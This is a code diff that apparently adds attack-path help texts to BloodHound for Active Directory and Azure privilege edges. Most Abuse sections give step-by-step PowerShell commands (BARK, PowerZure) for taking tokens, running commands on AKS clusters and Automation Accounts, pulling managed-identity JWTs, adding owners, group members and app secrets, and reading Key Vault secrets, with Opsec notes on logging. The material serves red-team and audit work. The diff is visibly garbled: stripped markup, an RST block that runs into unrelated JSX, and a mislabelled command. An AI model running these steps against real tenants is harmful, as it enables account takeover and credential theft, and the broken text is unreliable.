diff --git a/docs/data-analysis/edges.rst b/docs/data-analysis/edges.rst index 30e83edee..989731b48 100644 --- a/docs/data-analysis/edges.rst +++ b/docs/data-analysis/edges.rst @@ -257,6 +257,52 @@ References | +HasSIDHistory +^^^^^^^ + +The given source principal has, in its SIDHistory +attribute, the SID for the target principal. + +When a kerberos ticket is created for source principal, it will +include the SID for the target principal, and therefore grant +the source principal the same privileges and permissions as +the target principal. + + +Abuse Info +------------ + +No special actions are needed to abuse this, as the kerberos +tickets created will have all SIDs in the object's SID history +attribute added to them; however, if traversing a domain trust +boundary, ensure that SID filtering is not enforced, as SID +filtering will ignore any SIDs in the SID history portion of a +kerberos ticket. + +By default, SID filtering is not enabled for all domain trust +types. + +Opsec Considerations +-------------------- + +No opsec considerations apply to this edge. + +References +---------- + +* https://blog.harmj0y.net/redteaming/the-trustpocalypse/ +* https://blog.harmj0y.net/redteaming/a-guide-to-attacking-domain-trusts/ +* https://adsecurity.org/?p=1772 +* https://adsecurity.org/?tag=sidhistory +* https://attack.mitre.org/techniques/T1178/ +* https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/ + +| + +---- + +| + ForceChangePassword ^^^^^^^^^^^^^^^^^^^ @@ -2058,6 +2104,45 @@ References | +WriteAccountRestrictions +^^^^^^^ + +This edge indicates the principal has the ability to write to modify several properties on the target principal, most notably the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation to compromise the remote computer system. This property is a binary DACL that controls what security principals can pretend to be any domain user to the particular computer object. + +This clip demonstrates how to abuse this edge: + +.. raw:: html + +
+ You can use BARK's Invoke-AzureRMAKSRunCommand function + to execute commands on compute nodes associated with the + target AKS Managed Cluster. +
+ ++ This function requires you to supply an Azure Resource Manager + scoped JWT associated with the principal that has the privilege + to execute commands on the cluster. There are several ways to + acquire a JWT. For example, you may use BARK's + Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT + by supplying a refresh token: +
+ +
+
+ {
+ '$ARMToken = Get-ARMTokenWithRefreshToken `\n' +
+ ' -RefreshToken "0.ARwA6WgJJ9X2qk…" `\n' +
+ ' -TenantID "contoso.onmicrosoft.com"'
+ }
+
+
+
+
+ + Now you can use BARK's Invoke-AzureRMAKSRunCommand function + to execute a command against the target AKS Managed Cluster. + For example, to run a simple "whoami" command: +
+ +
+
+ {
+ 'Invoke-AzureRMAKSRunCommand `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" `\n' +
+ ' -Command "whoami"'
+ }
+
+
+
+ + If the AKS Cluster or its associated Virtual Machine Scale Sets + have managed identity assignments, you can use BARK's + Invoke-AzureRMAKSRunCommand function to retrieve a JWT for the + managed identity Service Principal like this: +
+ +
+
+ {
+ 'Invoke-AzureRMAKSRunCommand `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" `\n' +
+ ' -Command \'curl -i -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://graph.microsoft.com/&api-version=2019-08-01"\''
+ }
+
+
+
+ + If successful, the output will include a JWT for the managed identity + service principal. +
+ > + ); +}; + +export default Abuse; \ No newline at end of file diff --git a/src/components/Modals/HelpTexts/AZAKSContributor/General.jsx b/src/components/Modals/HelpTexts/AZAKSContributor/General.jsx new file mode 100644 index 000000000..bb2607789 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAKSContributor/General.jsx @@ -0,0 +1,15 @@ +import React from 'react'; + +const General = () => { + return ( ++ The Azure Kubernetes Service Contributor role grants full control + of the target Azure Kubernetes Service Managed Cluster. This includes + the ability to remotely fetch administrator credentials for the cluster + as well as the ability to execute arbitrary commands on compute + nodes associated with the AKS Managed Cluster. +
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZAKSContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZAKSContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAKSContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZAKSContributor/References.jsx b/src/components/Modals/HelpTexts/AZAKSContributor/References.jsx new file mode 100644 index 000000000..457bae3bf --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAKSContributor/References.jsx @@ -0,0 +1,17 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + ++ You can use BARK to add a new owner to the target object. The + BARK function you use will depend on the target object type, + but all of the functions follow a similar syntax. +
+ ++ These functions require you to supply an MS Graph-scoped JWT + associated with the principal that has the privilege to add a + new owner to your target object. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-GraphTokenWithRefreshToken to acquire an MS Graph-scoped JWT + by supplying a refresh token: +
+ +
+
+ {
+ '$MGToken = Get-GraphTokenWithRefreshToken `\n' +
+ ' -RefreshToken "0.ARwA6WgJJ9X2qk…" `\n' +
+ ' -TenantID "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + To add a new owner to a Service Principal, use BARK's + New-ServicePrincipalOwner function: +
+ +
+
+ {
+ 'New-ServicePrincipalOwner `\n' +
+ ' -ServicePrincipalObjectId "082cf9b3-24e2-427b-bcde-88ffdccb5fad" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+
+ + To add a new owner to an App Registration, use BARK's New-AppOwner function: +
+ +
+
+ {
+ 'New-AppOwner `\n' +
+ ' -AppObjectId "52114a0d-fa5b-4ee5-9a29-2ba048d46eee" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+
+ >
+ );
+};
+
+export default Abuse;
diff --git a/src/components/Modals/HelpTexts/AZAddOwner/General.jsx b/src/components/Modals/HelpTexts/AZAddOwner/General.jsx
new file mode 100644
index 000000000..f76b99132
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZAddOwner/General.jsx
@@ -0,0 +1,31 @@
+import React from 'react';
+
+const General = () => {
+ return (
+ <>
+ + This edge is created during post-processing. It is created against + all App Registrations and Service Principals within the same tenant + when an Azure principal has one of the following Azure Active + Directory roles: +
+ ++
+ You will not see these privileges when auditing permissions against + any of the mentioned objects when you use Microsoft tooling, including + the Azure portal or any API. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZAddOwner/Opsec.jsx b/src/components/Modals/HelpTexts/AZAddOwner/Opsec.jsx new file mode 100644 index 000000000..5f3080e26 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAddOwner/Opsec.jsx @@ -0,0 +1,15 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ Any time you add an owner to any Azure object, the AzureAD audit + logs will create an event logging who added an owner to what object, + as well as what the new owner added to the object was. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZAddOwner/References.jsx b/src/components/Modals/HelpTexts/AZAddOwner/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAddOwner/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ You can use BARK's New-AzureAutomationAccountRunBook and + Get-AzureAutomationAccountRunBookOutput functions to execute + arbitrary commands against the target Automation Account. +
+ ++ These functions require you to supply an Azure Resource Manager + scoped JWT associated with the principal that has the privilege + to add or modify and run Automation Account run books. There are + several ways to acquire a JWT. For example, you may use BARK's + Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT + by supplying a refresh token: +
+ +
+
+ {
+ '$ARMToken = Get-ARMTokenWithRefreshToken ` \n' +
+ ' -RefreshToken "0.ARwA6WgJJ9X2qk…" ` \n' +
+ ' -TenantID "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Now you can use BARK's New-AzureAutomationAccountRunBook function + to add a new runbook to the target Automation Account, specifying + a command to execute using the -Script parameter: +
+ +
+
+ {
+ 'New-AzureAutomationAccountRunBook `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -RunBookName "MyCoolRunBook" `\n' +
+ ' -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount" `\n' +
+ ' -Script "whoami"'
+ }
+
+
+
+ + After adding the new runbook, you must execute it and fetch its + output. You can do this automatically with BARK's + Get-AzureAutomationAccountRunBookOutput function: +
+ +
+
+ {
+ 'Get-AzureAutomationAccountRunBookOutput `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -RunBookName "MyCoolRunBook" `\n' +
+ ' -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount"'
+ }
+
+
+
+ + If the Automation Account has a managed identity assignment, you can use + these two functions to retrieve a JWT for the service principal like this: +
+ +
+
+ {
+ '$Script = $tokenAuthURI = $env:MSI_ENDPOINT + "?resource=https://graph.microsoft.com/&api-version=2017-09-01"; $tokenResponse = Invoke-RestMethod -Method Get -Headers @{"Secret"="$env:MSI_SECRET"} -Uri $tokenAuthURI; $tokenResponse.access_token\n' +
+ 'New-AzureAutomationAccountRunBook -Token $ARMToken -RunBookName "MyCoolRunBook" -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount" -Script $Script\n' +
+ 'Get-AzureAutomationAccountRunBookOutput -Token $ARMToken -RunBookName "MyCoolRunBook" -AutomationAccountPath "https://management.azure.com/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourceGroups/AutomationAccts/providers/Microsoft.Automation/automationAccounts/MyCoolAutomationAccount"'
+ }
+
+
+
+ + If successful, the output will include a JWT for the managed identity + service principal. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZAutomationContributor/General.jsx b/src/components/Modals/HelpTexts/AZAutomationContributor/General.jsx new file mode 100644 index 000000000..48acc4c62 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAutomationContributor/General.jsx @@ -0,0 +1,14 @@ +import React from 'react'; + +const General = () => { + return ( ++ The Azure Automation Contributor role grants full control + of the target Azure Automation Account. This includes + the ability to execute arbitrary commands on the Automation + Account. +
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZAutomationContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZAutomationContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAutomationContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZAutomationContributor/References.jsx b/src/components/Modals/HelpTexts/AZAutomationContributor/References.jsx new file mode 100644 index 000000000..8e198b86d --- /dev/null +++ b/src/components/Modals/HelpTexts/AZAutomationContributor/References.jsx @@ -0,0 +1,17 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + ++ You can read secrets and alter access policies (grant yourself access to read secrets) +
+ +Via PowerZure:
+ + Get-AzureKeyVaultContent + ++ The Key Vault Contributor role grants full control of the + target Key Vault. This includes the ability to read all secrets + stored on the Key Vault. +
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/References.jsx b/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/References.jsx new file mode 100644 index 000000000..80bb89fa4 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZKeyVaultKVContributor/References.jsx @@ -0,0 +1,25 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/{' '} + ++ Currently you need access to the portal GUI to execute this abuse. +
+ ++ The abuse involves adding or modifying an existing logic app to coerce + the logic app into sending a JWT for its managed identity service principal + to a web server you control. +
+ ++ You can see a full walkthrough for executing that abuse in this blog post: +
+ ++ + Andy Robbins - Managed Identity Attack Paths, Part 2: Logic Apps + +
+ + > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZLogicAppContributor/General.jsx b/src/components/Modals/HelpTexts/AZLogicAppContributor/General.jsx new file mode 100644 index 000000000..d8723b6d5 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZLogicAppContributor/General.jsx @@ -0,0 +1,13 @@ +import React from 'react'; + +const General = () => { + return ( ++ The Logic Contributor role grants full control + of the target Logic App. This includes the ability + to execute arbitrary commands on the Logic App. +
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZLogicAppContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZLogicAppContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZLogicAppContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZLogicAppContributor/References.jsx b/src/components/Modals/HelpTexts/AZLogicAppContributor/References.jsx new file mode 100644 index 000000000..74ce370ab --- /dev/null +++ b/src/components/Modals/HelpTexts/AZLogicAppContributor/References.jsx @@ -0,0 +1,17 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + ++ You can abuse this privilege using BARK's Add-AZMemberToGroup + function. +
+ ++ This function requires you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to add principal to the target group. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Then use BARK’s Add-AZMemberToGroup function to add a new principial + to the target group: +
+ +
+
+ {
+ 'Add-AZMemberToGroup `\n' +
+ ' -PrincipalID = "028362ca-90ae-41f2-ae9f-1a678cc17391" `\n' +
+ ' -TargetGroupId "b9801b7a-fcec-44e2-a21b-86cb7ec718e4" `\n' +
+ ' -Token $MGToken.access_token'
+ }
+
+
+
+ + Now you can re-authenticate as the principial you just added to the group + and continue your attack path, now having whatever privileges the target + group has. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGAddMember/General.jsx b/src/components/Modals/HelpTexts/AZMGAddMember/General.jsx new file mode 100644 index 000000000..55fcdd612 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddMember/General.jsx @@ -0,0 +1,40 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created during post-processing. It is created against + non role assignable Azure AD security groups when a Service + Principal has one of the following MS Graph app role assignments: +
+ ++ It is created against all Azure AD security groups, including those + that are role assignable, when a Service Principal has the following + MS Graph app role: +
+ ++ You will not see this privilege when using just the Azure portal + or any other Microsoft tooling. If you audit the roles and administrators + affecting any particular Azure security group, you will not see + that the Service Principal can add members to the group, but it + indeed can because of the parallel access management system used + by MS Graph. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGAddMember/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGAddMember/Opsec.jsx new file mode 100644 index 000000000..4aa533e4b --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddMember/Opsec.jsx @@ -0,0 +1,14 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ The Azure activity log for the tenant will log who added what + principal to what group, including the date and time. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGAddMember/References.jsx b/src/components/Modals/HelpTexts/AZMGAddMember/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddMember/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ You can use BARK to add a new owner to the target object. The + BARK function you use will depend on the target object type, + but all of the functions follow a similar syntax. +
+ ++ These functions require you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to add a new owner to the target object. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + To add a new owner to a Service Principal, use BARK's + New-ServicePrincipalOwner function: +
+ +
+
+ {
+ 'New-ServicePrincipalOwner `\n' +
+ ' -ServicePrincipalObjectId "082cf9b3-24e2-427b-bcde-88ffdccb5fad" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+
+ + To add a new owner to an App Registration, use BARK's New-AppOwner function: +
+ +
+
+ {
+ 'New-AppOwner `\n' +
+ ' -AppObjectId "52114a0d-fa5b-4ee5-9a29-2ba048d46eee" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+
+ + To add a new owner to a Group, use BARK's New-GroupOwner function: +
+ +
+
+ {
+ 'New-AppOwner `\n' +
+ ' -GroupObjectId "352032bf-161d-4788-b77c-b6f935339770" `\n' +
+ ' -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `\n' +
+ ' -Token $Token'
+ }
+
+
+ >
+ );
+};
+
+export default Abuse;
diff --git a/src/components/Modals/HelpTexts/AZMGAddOwner/General.jsx b/src/components/Modals/HelpTexts/AZMGAddOwner/General.jsx
new file mode 100644
index 000000000..baa49f30a
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZMGAddOwner/General.jsx
@@ -0,0 +1,65 @@
+import React from 'react';
+
+const General = () => {
+ return (
+ <>
+ + This edge is created during post-processing. It is created against + all App Registrations and Service Principals within the same tenant + when a Service Principal has the following MS Graph app role: +
+ ++
+ It is also created against all Azure Service Principals when a + Service Principal has the following MS Graph app role: +
+ ++
+ It is also created against all Azure security groups that are not + role eligible when a Service Principal has one of the following MS + Graph app roles: +
+ ++
+ Finally, it is created against all Azure security groups and all + Azure App Registrations when a Service Principal has the following + MS Graph app role: +
+ ++
+ You will not see these privileges when auditing permissions against + any of the mentioned objects when you use Microsoft tooling, including + the Azure portal and the MS Graph API itself. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGAddOwner/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGAddOwner/Opsec.jsx new file mode 100644 index 000000000..5f3080e26 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddOwner/Opsec.jsx @@ -0,0 +1,15 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ Any time you add an owner to any Azure object, the AzureAD audit + logs will create an event logging who added an owner to what object, + as well as what the new owner added to the object was. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGAddOwner/References.jsx b/src/components/Modals/HelpTexts/AZMGAddOwner/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddOwner/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ There are several ways to perform this abuse, depending on what + sort of access you have to the credentials of the object that + holds this privilege against the target object. If you have an + interactive web browser session for the Azure portal, it is as + simple as finding the target App in the portal and adding a new + secret to the object using the “Certificates & secrets” tab. + Service Principals do not have this tab in the Azure portal but + you can add secrets to them with the MS Graph API. +
+ ++ No matter what kind of control you have, you will be able to + perform this abuse by using BARK’s New-AppRegSecret or + New-ServicePrincipalSecret functions. +
+ ++ These functions require you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to add secrets to the target object. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Then use BARK’s New-AppRegSecret to add a new secret to the + target application: +
+ +
+
+ {
+ 'New-AppRegSecret `\n' +
+ ' -AppRegObjectID "d878…" `\n' +
+ ' -Token $MGToken.access_token'
+ }
+
+
+
+ + The output will contain the plain-text secret you just created + for the target app: +
+ +
+
+ {
+ 'New-AppRegSecret `\n' +
+ ' -AppRegObjectID "d878…" `\n' +
+ ' -Token $MGToken.access_token\n' +
+ '\n' +
+ 'Name Value\n' +
+ '-----------------------------\n' +
+ 'AppRegSecretValue odg8Q~...\n' +
+ 'AppRegAppId 4d31…\n' +
+ 'AppRegObjectId d878…'
+ }
+
+
+
+ + With this plain text secret, you can now acquire tokens as the + service principal associated with the app. You can easily do + this with BARK’s Get-MSGraphToken function: +
+ +
+
+ {
+ '$SPToken = Get-MSGraphToken `\n' +
+ ' -ClientID "4d31…" `\n' +
+ ' -ClientSecret "odg8Q~..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Now you can use this JWT to perform actions against any other MS + Graph endpoint as the service principal, continuing your attack + path with the privileges of that service principal. +
+ > + ); +}; + +export default Abuse; \ No newline at end of file diff --git a/src/components/Modals/HelpTexts/AZMGAddSecret/General.jsx b/src/components/Modals/HelpTexts/AZMGAddSecret/General.jsx new file mode 100644 index 000000000..667d9fe20 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddSecret/General.jsx @@ -0,0 +1,31 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created during post-processing. It is created against + all Azure App Registrations and Service Principals when a Service + Principal has one of the following MS Graph app roles: +
+ ++
+ You will not see this privilege when using just the Azure portal + or any other Microsoft tooling. If you audit the roles and administrators + affecting any particular Azure App or Service Principal, you will not see + that the Service Principal can add secrets to the object, but it + indeed can because of the parallel access management system used + by MS Graph. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGAddSecret/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGAddSecret/Opsec.jsx new file mode 100644 index 000000000..6fd8e62f2 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddSecret/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ When you create a new secret for an App or Service Principal, + Azure creates an event called “Update application – Certificates + and secrets management”. This event describes who added the secret + to which application or service principal. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGAddSecret/References.jsx b/src/components/Modals/HelpTexts/AZMGAddSecret/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAddSecret/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the AppRoleAssignment.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/General.jsx new file mode 100644 index 000000000..0b9823d73 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the AppRoleAssignment.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..5ebdcbbc2 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the AppRoleAssignment.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGAppRoleAssignment_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the Application.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/General.jsx new file mode 100644 index 000000000..af01ff83c --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Application.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..97bcdde41 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Application.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the Directory.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/General.jsx new file mode 100644 index 000000000..1bbb9e134 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Directory.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..8937a6128 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Directory.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
